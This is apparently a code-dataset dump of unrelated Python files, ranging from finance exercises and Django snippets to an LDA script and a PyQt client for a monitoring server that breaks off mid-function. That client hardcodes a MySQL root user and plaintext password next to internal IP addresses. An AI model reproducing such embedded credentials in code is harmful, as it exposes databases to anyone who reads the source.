{\n\t\t\t'formulario': formulario\n\t\t}\n\t\treturn render(request, 'postulacion/postular.html', context)","sub_path":"apps/persona/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"588456139","text":"###########################################################################\r\n# Description: This is the exercises of chapter 5 in Investment Sciense.\r\n# Author: Yeda Cui\r\n\r\ndef AddDim(lst, addlst):\r\n donelst = []\r\n if len(lst) is 0:\r\n for i in addlst:\r\n donelst.append([i])\r\n else:\r\n for i in lst:\r\n for j in addlst:\r\n donelst.append(i + [j])\r\n return donelst\r\n\r\n\r\n# Exercise 2\r\n\r\nnet_return = [4, 5, 3, 4.3, 1, 1.5, 2.5, 0.3, 1, 2]\r\noutlay = [2, 3, 1.5, 2.2, 0.5, 1.5, 2.5, 0.1, 0.6, 1]\r\n\r\n\r\ndef OptimalInvest(n, net_return, outlay):\r\n # While using the function, you may set the condition by yourself!\r\n\r\n class INVEST:\r\n number = 0\r\n net_return = 0\r\n outlay = 0\r\n\r\n def __init__(self, invest):\r\n self.invest = invest\r\n INVEST.number += 1\r\n\r\n def GetReturn(self):\r\n length = len(self.invest)\r\n sum = 0\r\n for i in range(length):\r\n sum = sum + INVEST.net_return[self.invest[i]]\r\n return sum\r\n\r\n def GetOutlay(self):\r\n length = len(self.invest)\r\n sum = 0\r\n for i in range(length):\r\n sum = sum + INVEST.outlay[self.invest[i]]\r\n return sum\r\n\r\n def GetCondition(self):\r\n if (self.invest[0] in [1, 3]) and (self.invest[1] == 4):\r\n return False\r\n else:\r\n if self.GetOutlay() > 5:\r\n return False\r\n else:\r\n return True\r\n\r\n INVEST.net_return = net_return\r\n INVEST.outlay = outlay\r\n\r\n Invest_List = []\r\n for i in range(len(n)):\r\n addlst = list(range(sum(n[0:i]), sum(n[0:i + 1])))\r\n Invest_List = AddDim(Invest_List, addlst)\r\n\r\n invests = []\r\n for i in Invest_List:\r\n invests.append(INVEST(i))\r\n\r\n Invest_List = invests\r\n\r\n return_list = []\r\n Invest_Avialbe = []\r\n for i in range(len(Invest_List)):\r\n if Invest_List[i].GetCondition():\r\n return_list.append(Invest_List[i].GetReturn())\r\n Invest_Avialbe.append(Invest_List[i])\r\n\r\n return ([Invest_Avialbe[return_list.index(max(return_list))].invest,\r\n Invest_Avialbe[return_list.index(max(return_list))].GetReturn(),\r\n Invest_Avialbe[return_list.index(max(return_list))].GetOutlay()])\r\n\r\n\r\n# exercise 3\r\n\r\nnet_return = [150, 200, 100, 100, 120, 150, 240]\r\noutlay1 = [90, 80, 50, 20, 40, 80, 80]\r\noutlay2 = [58, 80, 100, 64, 50, 20, 100]\r\n\r\ndef OptimalInvest(n, net_return, outlay1, outlay2):\r\n# While using the function, you may set the condition by yourself!\r\n\r\n class INVEST:\r\n number = 0\r\n net_return = 0\r\n outlay1 = 0\r\n outlay2 = 0\r\n\r\n def __init__(self, invest):\r\n self.invest = invest\r\n INVEST.number += 1\r\n\r\n def GetReturn(self):\r\n length = len(self.invest)\r\n sum = 0\r\n for i in range(length):\r\n sum = sum + INVEST.net_return[i]*self.invest[i]\r\n return sum\r\n\r\n def GetOutlay1(self):\r\n length = len(self.invest)\r\n sum = 0\r\n for i in range(length):\r\n sum = sum + INVEST.outlay1[i]*self.invest[i]\r\n return sum\r\n\r\n def GetOutlay2(self):\r\n length = len(self.invest)\r\n sum = 0\r\n for i in range(length):\r\n sum = sum + INVEST.outlay2[i]*self.invest[i]\r\n return sum\r\n\r\n def GetCondition(self):\r\n if self.GetOutlay1() <= 250 and self.GetOutlay2() <= (250 - self.GetOutlay1())*1.1 + 250 :\r\n return True\r\n else:\r\n return False\r\n\r\n INVEST.net_return = net_return\r\n INVEST.outlay1 = outlay1\r\n INVEST.outlay2 = outlay2\r\n\r\n Invest_List = []\r\n for i in range(len(n)):\r\n Invest_List = AddDim(Invest_List, list(range(n[i])))\r\n\r\n invests = []\r\n for i in Invest_List:\r\n invests.append(INVEST(i))\r\n\r\n Invest_List = invests\r\n\r\n return_list = []\r\n Invest_Avialbe = []\r\n for i in range(len(Invest_List)):\r\n if Invest_List[i].GetCondition():\r\n return_list.append(Invest_List[i].GetReturn())\r\n Invest_Avialbe.append(Invest_List[i])\r\n\r\n return ([Invest_Avialbe[return_list.index(max(return_list))].invest,\r\n Invest_Avialbe[return_list.index(max(return_list))].GetReturn(),\r\n Invest_Avialbe[return_list.index(max(return_list))].GetOutlay1(),\r\n Invest_Avialbe[return_list.index(max(return_list))].GetOutlay2()])\r\n\r\n\r\n\r\n","sub_path":"Exercise_Chapter 5.py","file_name":"Exercise_Chapter 5.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"197890535","text":"import json\nfrom collections import defaultdict\n#from flask import Flask, request\nfrom pytrie import Trie\nimport uuid\nimport requests\n\n#app = Flask(__name__)\n\nuniversity_data = list()\nuniversity_country_index = defaultdict(list)\nuniversity_domain_index = defaultdict(list)\nuniversity_name_index = dict()\n\n\ndef search(domain='',country='',name=''):\n if not uni_data_loaded:\n load_data()\n\n #country = request.args.get('country')\n #name = request.args.get('name')\n #domain = request.args.get('domain')\n filtered = university_data\n\n if name and country:\n name = name.lower()\n country = country.lower()\n name_filtered = prefix_tree.values(prefix=name)\n country_filtered = university_country_index[country]\n filtered = [i for i in name_filtered if i['name'] in [_i['name'] for _i in country_filtered]]\n\n elif domain:\n domain = domain.lower()\n filtered = university_domain_index[domain]\n\n elif name:\n name = name.lower()\n filtered = prefix_tree.values(prefix=name)\n elif country:\n country = country.lower()\n filtered = university_country_index[country]\n\n return len(filtered)\n\nuni_data_loaded = False\n\n\ndef load_data():\n [print('Loading uni data') for i in range(10)]\n global uni_data_loaded, prefix_tree, university_data, university_country_index, university_name_index, university_domain_index\n response = requests.get(\"https://raw.githubusercontent.com/Hipo/university-domains-list/master/world_universities_and_domains.json\")\n university_data = response.json()\n for i in university_data:\n #university_country_index[i[\"country\"].lower()].append(i)\n [university_domain_index[j.lower()].append(i) for j in i[\"domains\"]]\n #university_name_index[i['name'].lower()] = i\n '''\n splitted = i['name'].split(\" \")\n if len(splitted) > 1:\n for splitted_name in splitted[1:]:\n university_name_index[splitted_name.lower() + str(uuid.uuid1())] = i\n '''\n #prefix_tree = Trie(**university_name_index)\n\n uni_data_loaded = True\n\n'''\n@app.route('/')\ndef index():\n\n if not data_loaded:\n load_data()\n\n data = {'author': {'name': 'hipo', 'website': 'http://hipolabs.com'},\n 'example': 'http://universities.hipolabs.com/search?name=middle&country=Turkey',\n 'github': 'https://github.com/Hipo/university-domains-list'}\n return json.dumps(data)\n\nif __name__ == \"__main__\":\n app.run(debug=False)\n'''","sub_path":"memprot_project/uni_app.py","file_name":"uni_app.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"440092642","text":"'''\nCreated on Apr 9, 2016\n\n@author: joep\n'''\nimport os\n\nds_type = 'large'\nBASE = os.path.dirname(os.path.realpath(__file__))\n\ninf = open(os.path.join(BASE, 'A-large.in'.format(ds_type)), 'r')\noutf = open(os.path.join(BASE, '{}.out'.format(ds_type)), 'w+')\n\ncases = int(inf.readline())\n\nfor case in range(cases):\n n = int(inf.readline())\n \n if n == 0:\n c_n = 'INSOMNIA'\n \n else:\n i = 1\n digs = set()\n while True:\n c_n = str(i * n)\n digs.update(set(c_n))\n \n done = True\n for dig in '0123456789':\n if dig not in digs:\n done = False\n break\n \n if done:\n break\n \n i += 1\n \n outf.write('Case #{}: {}\\n'.format(case + 1, c_n))\n print('Finished {}'.format(case + 1))\n \n","sub_path":"codes/CodeJamCrawler/16_0_1/Smetterleen/qual1.py","file_name":"qual1.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"20402279","text":"n = int(input())\r\ndef fibo(x):\r\n a, b = 1, 1\r\n if x == 1 or x == 2:\r\n return a\r\n while x > 1:\r\n a, b = b, (a + b) % 10007\r\n x -= 1\r\n return a\r\nprint(fibo(n))","sub_path":"蓝桥杯/begin_4.py","file_name":"begin_4.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"286928993","text":"from lib.data_analysis.algorithms.texts.lda import LDA\nfrom lib.data_analysis.texts.stop_words import StopWords\nfrom lib.data_analysis.texts.corpus import Corpus\nimport pandas as pd\n\nsw = StopWords(\"/home/sokolov/PycharmProjects/t/DataAnalysis/lib/data_analysis/texts/stopwords.dic\")\nsw.load_stop_words_from_file()\nsw.load_stop_word_from_nltk_lib()\n\ndata = pd.read_csv(\"/home/sokolov/PycharmProjects/t/DataAnalysis/LWs/LW_11/data/lenta_ru.csv\")\ndocuments = data[\"text\"].tolist()\n\ncorpus = Corpus()\ncorpus.load_corpus_from_list(documents)\n\nlda = LDA(corpus=corpus, stop_words=sw, K=20, alpha=0.5, beta=0.5, iterations=50)\nlda.run()\nprint(\"\\n\", lda.worddist())\n","sub_path":"LWs/LW_11/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"87430031","text":"import os\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ModelProject.settings')\nfrom django import setup\nsetup()\n\nfrom ModelApp.models import Person\n\npersons = Person.objects.all()\n\nfor person in persons:\n print(person.id, person, person.salary)\n\n# person = Person.objects.get(first_name='Taro')\nperson = Person.objects.get(pk=1)\nprint(person.id, person)\n\nprint('*' * 100)\n\npersons = Person.objects.filter(first_name='Taro').all()\nprint(persons)\nprint(persons[0].email)\nfor person in persons:\n print(person.id, person)","sub_path":"select_sample.py","file_name":"select_sample.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"91303255","text":"\"\"\"\n面试题:进程和线程的区别和联系?\n进程 - 操作系统分配内存的基本单位 - 一个进程可以包含一个或多个线程\n线程 - 操作系统分配CPU的基本单位\n并发编程(concurrent programming)\n1. 提升执行性能 - 让程序中没有因果关系的部分可以并发的执行\n2. 改善用户体验 - 让耗时间的操作不会造成程序的假死\n\"\"\"\n\nimport glob\nimport os\nimport threading\n\nfrom PIL import Image\n\nPREFIX = 'thumbnails'\n\n\ndef generate_thumbnail(infile, size, format='PNG'):\n \"\"\"生成指定图片文件的缩略图\"\"\"\n file, ext = os.path.splitext(infile)\n file = file[file.rfind('/') + 1:]\n outfile = f'{PREFIX}/{file}_{size[0]}_{size[1]}.{ext}'\n img = Image.open(infile)\n img.thumbnail(size, Image.ANTIALIAS)\n img.save(outfile, format)\n\n\ndef main():\n \"\"\"主函数\"\"\"\n if not os.path.exists(PREFIX):\n os.mkdir(PREFIX)\n for infile in glob.glob('images/*.png'):\n for size in (32, 64, 128):\n # 创建并启动线程\n threading.Thread(\n target=generate_thumbnail,\n args=(infile, (size, size))\n ).start()\n\n\nif __name__ == '__main__':\n main()","sub_path":"python_Project/Day_16-20/Day_16-20_并发/prac_1.py","file_name":"prac_1.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"615267835","text":"from django.test import TestCase\n\n# Create your tests here.\n\n\nfrom just_cd.deploy_app.deploy_manager import open_just_config\nimport os\nfrom django.conf import settings\nimport shutil\nimport yaml\n\n\nclass OpenConfigInvalidTestCase(TestCase):\n def setUp(self):\n path = os.path.join(settings.BASE_DIR, 'test_repo')\n if not os.path.isdir(path):\n os.mkdir(path)\n d = {'incorrect': 'test'}\n with open(os.path.join(settings.BASE_DIR, 'test_repo',\n 'just_config.yaml'), 'w') as yaml_file:\n yaml_file.write(yaml.dump(d, default_flow_style=False))\n\n def test_open_config_file_incorrect(self):\n result = open_just_config('test_repo')\n assert ('Deploy' not in result)\n\n def tearDown(self):\n path = os.path.join(settings.BASE_DIR, 'test_repo')\n shutil.rmtree(path)\n","sub_path":"just_cd/deploy_app/tests/test_open_config.py","file_name":"test_open_config.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"294236350","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\n\"\"\" შენიშნები\n1. mysql -დან მონაცემების წამოღება ხდება პირდაპირი კავშირით . მოსაფიქრებელია ალტერნატიული გზა\n2. Segmentation fault (core dumped) ზოგჯერ წერს , სანახავია მიზეზი!!!\n3. send_registration_request_to_ies_monitoring_server ფუნქციაში გამოვიყენოთ send_message_to_ies_monitoring_server ++\n\"\"\"\nimport sys\nimport pymysql # 0.9.3\nimport sqlite3\nimport socket\nimport pickle\nimport time\nimport threading\nimport os\nimport argparse\nimport logging\nimport select\nimport datetime\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets, uic # 5.12.2\nfrom message_dialog import Ui_Dialog\n\n# ies_monitor სკრიპტის ip-i რომელზედაც ვიღებთ სერვერიდან შეტყობინებას ies_monitoring_server-დან\n# ip - ს ვგებულობთ სერვერთან დაკავშირების მერე\n# არ არის საჭირო ხელით გაწერა, თავიდან არის ცარიელი\nies_monitor_ip = \"\"\n\n# ies_monitor სკრიპტის port რომელზედაც ვიღებთ სერვერიდან შეტყობინებას ies_monitoring_server-დან\nies_monitor_port = 54321\n\n# log ფაილის სახელი\nlog_filename = \"log\"\n\n# ies_monitoring_server-თან კავშირის შემოწმების მიახლოებითი ინტერვალი წამებში\ntest_ies_monitoring_server_connection_delay = 5\n\n# ies_monitoring_server-ის ip-ი მისამართი\nies_monitoring_server_ip = \"10.0.0.177\"\n\n# ies_monitoring_server-ის პორტი\nies_monitoring_server_port = 12345\n\n# mysql-ის ip მისამართი\nmysql_server_ip = \"localhost\"\n\n# mysql სერვერის user-ი\nmysql_server_user = \"root\"\n\n# mysql-სერვერის user-ის პაროლი\nmysql_user_pass = \"AcharuliXachapuri123!\"\n\n# mysql-სერვერის მონაცემთა ბაზის სახელი\nmysql_database_name = \"ies_monitoring_server\"\n\n# mysql-სერვერის პორტი\nmysql_server_port = 3306\n\n# მესიჯის buffer_size\nbuffer_size = 1036288 # 873114\n\n# დაყო��ნება პროგრამის ისეთ ციკლებში სადაც საჭიროა/რეკომენდირებულია შენელებული მუშაობა\ndelay = 0.1\n\n# ლოდინის დრო, თუ რამდენხანს დაველოდებით შეტყობინების მიღებას კავშირის დამყარების შემდეგ\nwaiting_message_timeout = 60\n\n# ლოდინის დრო, თუ რამდენხანს დაველოდებით შეტყობინების შემდეგი ნაწილის (ბაიტების) მიღებას\nnext_message_bytes_timeout = 30\n\n# დროის ინტერვალი თუ რამდენ წამში ერთხელ ვცადოთ სერვერზე რეგისტრაცია\nregistration_retry_time_interval = 15\n\n\n# -------------------------------------------------------------------------------------------------\n\n\n# კონსტანტები გამოიყენება სერვერთან კავშირის სტატუსის განსაზღვრისთვის\n# სერვერთან კავშირი გაწყვეტილია\nDISCONNECTED = 0\n# სერვერთან დაკავშირებულია\nCONNECTED = 1\n# სერვერთან კავშირის შემოწმება\nTESTING = 2\n\n# მესიჯის ჰედერის სიგრძე\nHEADERSIZE = 10\n\n\nclass ConsoleFormatter(logging.Formatter):\n \"\"\"\n კლასით განვსაზღვრავთ ტერმინალში გამოტანილი მესიჯის ფორმატს.\n\n \"\"\"\n date_format = \"%H:%M:%S\"\n default_format = \"%(asctime)s [%(levelname)s] %(msg)s\"\n info_format = \"%(msg)s\"\n\n def __init__(self):\n super().__init__(fmt=ConsoleFormatter.default_format, datefmt=ConsoleFormatter.date_format, style='%')\n\n def format(self, record):\n # დავიმახსოვროთ თავდაპირველი ფორმატი\n format_orig = self._style._fmt\n\n if record.levelno == logging.INFO:\n self._style._fmt = ConsoleFormatter.info_format\n\n # შევცვალოთ თავდაპირველი ფორმატი\n result = logging.Formatter.format(self, record)\n\n # დავაბრუნოთ თავდაპირველი ფორმატი\n self._style._fmt = format_orig\n\n return result\n\n\n# parser - ის შექმნა\nparser = argparse.ArgumentParser(description=\"???!! ...დასაწერია პროგრამის განმარტება\")\nparser.add_argument('-d', '--debug', action='store_true', help='ლოგგერის დონის შეცვლა debug ზე')\nargs = parser.parse_args()\n\n# logger - ის შექმნა\nlogger = logging.getLogger('ies_monitoring_server_logger')\nlogger.setLevel(logging.DEBUG)\n\n# შევქმნათ console handler - ი და განვსაზღვროთ დონე და ფორმატი\nconsole_handler = logging.StreamHandler(sys.stdout)\n\n# არგუმენტიდან გამომდინარე დავაყენოთ ტერმინალში ლოგგერის დონე\nif args.debug:\n console_handler.setLevel(logging.DEBUG)\nelse:\n console_handler.setLevel(logging.INFO)\n\nconsole_formatter = ConsoleFormatter()\nconsole_handler.setFormatter(console_formatter)\nlogger.addHandler(console_handler)\n\n# FileHandler - ის შექმნა. დონის და ფორმატის განსაზღვრა\nlog_file_handler = logging.FileHandler(log_filename)\nlog_file_handler.setLevel(logging.DEBUG)\nlog_file_formatter = logging.Formatter(\"%(asctime)s [%(levelname)s] %(message)s\")\nlog_file_handler.setFormatter(log_file_formatter)\nlogger.addHandler(log_file_handler)\n\n\nclass MainWindow(QtWidgets.QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n uic.loadUi('main_window.ui', self)\n\n # ცვლადი რომლის საშუალებით პროგრამის დახურვისას ითიშება თრედები\n self.application_is_closing = False\n\n # სერვერთან კავშირის სტატუსი\n self.connection_state = DISCONNECTED\n\n # socket - ობიექტის შექმნა\n self.listener_socket = socket.socket()\n\n # ბოლო მიღებული მესიჯის კატეგორია\n self.last_received_message_category = None\n\n reconnect = QtWidgets.QAction(\"&Reconnect\", self)\n reconnect.triggered.connect(lambda: self.send_registration_request_to_ies_monitoring_server())\n\n menu_bar = self.menuBar()\n connect_menu = menu_bar.addMenu('&Connection')\n connect_menu.addAction(reconnect)\n\n # QAction ობიექტის შექმნა\n main_window_close_action = QtWidgets.QAction(\"Quit\", self)\n\n # main_window_close_action ხდომილების შემთხვევაში გამოვიძახოთ main_window_close_event ფუნქცია\n main_window_close_action.triggered.connect(self.closeEvent)\n\n # message_table - ზე ორჯერ დაჭერით გამოვიძახოთ message_table_double_click\n self.message_table.doubleClicked.connect(self.message_table_double_click)\n\n # ???\n self.mysql_table_col_names = [\n \"message_id\", \"sent_message_datetime\", \"message_type\",\n \"message_title\", \"text\", \"client_ip\", \"client_script_name\"\n ]\n\n # ???\n self.mysql_table_col_readable_names = [\n \"ID\", \"Time\", \"Message Type\",\n \"Message Title\", \"Message\",\n \"Client IP\", \"Script Name\"\n ]\n\n # ეშვება update_connection_status ფუნქცია თრედად\n threading.Thread(target=self.update_connection_status).start()\n\n # ეშვება communicate_to_ies_monitoring_server_thread ფუნქცია თრედად\n threading.Thread(target=self.communicate_to_ies_monitoring_server_thread).start()\n\n # ვიძახებთ set_qtablewidget_style ფუნქციას\n self.set_qtablewidget_style()\n\n # ვიძახებთ connect_to_mysql ფუნქციას\n self.connect_to_mysql()\n\n # ვიძახებთ load_messages_from_mysql ფუნქციას\n self.load_messages_from_mysql()\n\n # ვიძახებთ connect_to_sqlite ფუნქციას\n self.connect_to_sqlite()\n\n # ვიძახებთ check_opened_messages ფუნქციას\n self.check_opened_messages()\n\n def update_connection_status(self):\n \"\"\" ფუნქცია სტატუს ბარში აჩვენებს ies_monitoring_server -თან კავშირის სტატუსს \"\"\"\n\n while self.application_is_closing is False:\n if self.connection_state is CONNECTED:\n self.statusbar.showMessage(\"CONNECTED\")\n elif self.connection_state is TESTING:\n self.statusbar.showMessage(\"TESTING\")\n elif self.connection_state is DISCONNECTED:\n self.statusbar.showMessage(\"DISCONNECTED\")\n time.sleep(delay)\n\n def connect_ies_monitoring_server(self, verbose=True):\n \"\"\" ფუნქცია უკავშირდება ies_monitoring_server-ს \"\"\"\n\n # connection სოკეტის შექმნა\n connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n try:\n # დავუკავშირდეთ ies_monitoring_server-ს\n connection.connect((ies_monitoring_server_ip, ies_monitoring_server_port))\n if verbose is True:\n logger.debug(\"სერვერთან კავშირი დამყარებულია\")\n except Exception as ex:\n if verbose is True:\n logger.warning(\"სერვერთან კავშირი ვერ დამყარდა. \" + str(ex))\n return False\n return connection\n\n def connection_close(self, connection, addr=None):\n \"\"\" ხურავს (კავშირს სერვერთან) პარამეტრად გადაცემულ connection socket ობიექტს \"\"\"\n\n if addr is None:\n logger.debug(\"listener_socket სოკეტის დახურვა \" + str(connection.getsockname()))\n else:\n logger.debug(\"კავშირის დახურვა \" + str(addr))\n connection.shutdown(socket.SHUT_RDWR)\n connection.close()\n\n def communicate_to_ies_monitoring_server_thread(self):\n \"\"\"\n ფუნქცია ამოწმებს სერვერთან კავშირს, კავშირის დამყარების შემთხვევაში ვგებულობთ მიმდინარე\n ies_monitor-ის ip-ის, ეშვება listening_to_ies_monitoring_server ფუნქცია (ies_monitor-იწყებს მოსმენას)\n და ვაგზავნით რეგისტრაციის მოთხოვნას სანამ სერვერი არ გამოაგზავნის რეგისტრაციის დადასტურებას\n\n \"\"\"\n\n # ies_monitoring_server-თან დაკავშირება\n connection = self.connect_ies_monitoring_server(verbose=False)\n\n # სერვერთან დაკავშირების მცდელობის დრო\n test_server_connection_datetime = datetime.datetime.now()\n\n # ციკლი სერვერთან დასაკავშირებლად. ციკლიდან გამოვდივართ იმ შემთხვევაში თუ\n # კავშირი დამყარდა სერვერთან ან თუ პროგრამა იხურება\n while connection is False and self.application_is_closing is False:\n # შევამოწმოთ თუ სერვერთან დაკავშირების ცდიდან გავიდა test_ies_monitoring_server_connection_delay წამი\n if (datetime.datetime.now() - test_server_connection_datetime) > datetime.timedelta(seconds=test_ies_monitoring_server_connection_delay):\n logger.warning(\"პროგრამის ჩატვირთვის პროცესში ვერ მოხერხდა სერვერთან დაკავშირება\")\n # ies_monitoring_server-თან დაკავშირება\n connection = self.connect_ies_monitoring_server(verbose=False)\n\n # სერვერთან დაკავშირების მცდელობის დრო\n test_server_connection_datetime = datetime.datetime.now()\n\n # დაყოვნება\n time.sleep(delay)\n\n # თუ კავშირი დამყარდა ies_monitoring_server-თან\n if connection is not False:\n global ies_monitor_ip\n\n # შევინახოთ მიმდინარე ies_monitor-ის ip\n ies_monitor_ip = connection.getsockname()[0]\n\n logger.debug(\"პროგრამის ჩატვირთვის პროცესში სერვერთან კავშირი დამყარდა და განისაზღვრა \"\n \"ies_monitor-ის ip მისამართი: {}\".format(ies_monitor_ip))\n # ies_monitor-იწყებს მოსმენას\n threading.Thread(target=self.listening_to_ies_monitoring_server).start()\n\n self.register_to_ies_monitoring_server()\n\n def register_to_ies_monitoring_server(self):\n \"\"\" ფუნქცია აგზავნის რეგისტრაციის მოთხოვნას ies_monitoring_server -თან და ელოდება მისგან დასტურს \"\"\"\n\n # სერვერთან გასაგზავნი შეტყობინება\n server_message = {\n \"who_am_i\": \"ies_monitor\",\n \"message_category\": \"registration\",\n \"ip\": ies_monitor_ip,\n \"port\": ies_monitor_port\n }\n\n # რეგისტრაციის მოთხოვნის გაგზავნა\n registration_message_sent = self.send_registration_request_to_ies_monitoring_server(server_message)\n # რეგისტრაციის მოთხოვნის გაგზავნის მცდელობის დრო\n try_sent_registration_datetime = datetime.datetime.now()\n\n # ციკლი სერვერთან რეგისტრაციის შეტყობინების გასაგზავნად\n # ციკლიდან გამოვდივართ იმ შემთხვევაში თუ რეგისრაციის შეტყობინება გაიგზავნა\n # ან თუ პროგრამა იხურება\n while registration_message_sent is False and self.application_is_closing is False:\n # შევამოწმოთ თუ სერვერთან რეგისტრაციის შეტყობინების გაგზავნის ცდიდან გავიდა test_ies_monitoring_server_connection_delay წამი\n if (datetime.datetime.now() - try_sent_registration_datetime) > datetime.timedelta(seconds=test_ies_monitoring_server_connection_delay):\n # რეგისტრაციის მოთხოვნის გაგზავნა\n registration_message_sent = self.send_registration_request_to_ies_monitoring_server(server_message)\n if registration_message_sent is True:\n # ფუნქცია ელოდე��ა registration_verified კატეგორიის შეტყობინების მოსვლას\n self.wait_for_ies_monitoring_server_response(\"registration_verified\", registration_retry_time_interval, server_message, self.register_to_ies_monitoring_server)\n\n # ფუნქცია ამთავრებს მუშაობას თუ სერვერიდან დაბრუნდა რეგისტრაციაზე მოთხოვნის პასუხი\n return\n # რეგისტრაციის მოთხოვნის გაგზავნის მცდელობის დრო\n try_sent_registration_datetime = datetime.datetime.now()\n # დაყოვნება\n time.sleep(delay)\n\n # ფუნქცია ელოდება registration_verified კატეგორიის შეტყობინების მოსვლას\n self.wait_for_ies_monitoring_server_response(\"registration_verified\", registration_retry_time_interval, server_message, self.register_to_ies_monitoring_server)\n\n def send_message_to_ies_monitoring_server(self, message):\n \"\"\" ფუნქციიის საშუალებით შეიძლება შეტყობინების გაგზავნა ies_monitoring_server-თან \"\"\"\n\n # ies_monitoring_server-თან დაკავშირება\n ies_monitoring_server_connection = self.connect_ies_monitoring_server(verbose=False)\n\n # ies_monitoring_server-თან კავშირის შემოწმება\n if ies_monitoring_server_connection is False:\n logger.warning(\"შეტყობინება ვერ გაიგზავნა, ies_monitoring_server-თან კავშირი ვერ დამყარდა\\n{}\"\n .format(message))\n # ფუნქცია აბრუნებს False -ს ნიშნად იმისა რომ მესიჯი ვერ გაიგზავნა სერვერზე\n return False\n\n try:\n # შეტყობინების გაგზავნა\n ies_monitoring_server_connection.send(self.dictionary_message_to_bytes(message))\n logger.debug(\"შეტყობინება გაიგზავნა ies_monitoring_server-თან\\n{}\"\n .format(message))\n except Exception as ex:\n logger.warning(\"შეტყობინება ვერ გაიგზავნა ies_monitoring_server-თან\\n{}\\n{}\"\n .format(message, str(ex)))\n\n # ფუნქცია აბრუნებს False -ს ნიშნად იმისა რომ მესიჯი ვერ გაიგზავნა სერვერზე\n return False\n\n # სოკეტის დახურვა\n self.connection_close(ies_monitoring_server_connection, ies_monitoring_server_connection.getsockname())\n\n # ფუნქცია აბრუნებს True -ს ნიშნად იმისა რომ მესიჯი წარმატებით გაიგზავნა სერვერზე\n return True\n\n def send_database_pull_request_to_ies_monitoring_server(self):\n \"\"\" ფუნქციის საშუალებით ies_monitoring_server-ს ეგზავნება მონაცემთა ბაზის გამოგზავნის მოთხოვნა \"\"\"\n\n # database_pull_request პაკეტის შექმნა\n server_message = {\n \"who_am_i\": \"ies_monitor\",\n \"message_category\": \"database_pull_request\",\n \"ip\": ies_monitor_ip,\n \"port\": ies_monitor_port,\n \"last_message_id\": 0\n }\n\n # database_pull_request პაკეტის გაგზავნა\n self.send_message_to_ies_monitoring_server(server_message)\n\n # ფუნქცია ელოდება message_data კატეგორიის შეტყობინების მოსვლას\n self.wait_for_ies_monitoring_server_response(\"message_data\", 10, server_message)\n\n def wait_for_ies_monitoring_server_response(self, message_category, wait_time, message, function_name=None, args=()):\n \"\"\"\n ფუნქციის საშუალებით ვაკვირდებით გაგზავნილი შეტყობინების პასუხს\n message_category - პარამეტრით ეთითება მესიჯის კატეგორია რომელსაც ველოდებით სერვერისგან პასუ��ად\n wait_time - პარამეტრით ეთითება დრო წამებში თუ რა დროის მანძილზე ველოდებით სერვერისგან პასუხს. იმ\n შემთხვევაში თუ მითითებული დროის განმავლობაში სერვერიდან არ მოვიდა პასუხი, ფუნქცია თვლის რომ\n სერვერს არ მიუღია გაგზავნილი შეტყობინება\n \"\"\"\n\n # მესიჯის გაგზავნის დრო\n message_sent_time = datetime.datetime.now()\n\n # მუდმივი ციკლის საშუალებით ველოდებით გაგზავნილ შეტყობინებაზე პასუხს\n while self.last_received_message_category != message_category and self.application_is_closing is False:\n # შევამოწმოთ რა დრო გავიდა გაგზავნილი შეტყობინების შემდეგ\n if (datetime.datetime.now() - message_sent_time) > datetime.timedelta(seconds=wait_time):\n logger.warning(\"სერვერიდან არ მოვიდა პასუხი შეტყობინებაზე: \\n{}\".format(message))\n if function_name is not None:\n function_name(*args)\n # ციკლის დასრულება\n break\n # დაყოვნება\n time.sleep(delay)\n logger.debug(\"სერვერიდან მოვიდა პასუხი შეტყობინებაზე: \\n{}\".format(message))\n\n def testing_connection_to_ies_monitoring_server(self): # ???\n \"\"\" ფუნქცია უგზავნის Hello პაკეტებს ies_monitoring_server -ს რითაც მოწმდება კავშირის არსებობა \"\"\"\n\n # Hello პაკეტის შექმნა\n server_message = {\n \"who_am_i\": \"ies_monitor\",\n \"message_category\": \"hello\",\n \"ip\": ies_monitor_ip,\n \"port\": ies_monitor_port\n }\n\n # Hello პაკეტის გაგზავნა\n self.send_message_to_ies_monitoring_server(server_message)\n\n # შევინახოთ Hello პაკეტის გაგზავნის დრო\n sent_datetime = datetime.datetime.now()\n\n # პაკეტის გაგზავნის დროს ითვლება რომ კავშირი არ გვაქვს სერვერთან\n self.connection_state = TESTING\n\n # ციკლი რომელიც მუდმივად აგზავნის Hello პაკეტებს\n while True and self.application_is_closing is False:\n if (datetime.datetime.now() - sent_datetime) > datetime.timedelta(seconds=test_ies_monitoring_server_connection_delay):\n # Hello პაკეტის გაგზავნა\n self.send_message_to_ies_monitoring_server(server_message)\n\n # შევინახოთ Hello პაკეტის გაგზავნის დრო\n sent_datetime = datetime.datetime.now()\n\n # პაკეტის გაგზავნის დროს ითვლება რომ კავშირი არ გვაქვს სერვერთან\n self.connection_state = TESTING\n\n # ციკლი რომელიც ელოდება სერვერიდან Hello პაკეტის მიღებას\n while self.connection_state is TESTING:\n # ციკლის სტაბილური მუშაობისთვის\n time.sleep(delay)\n\n # 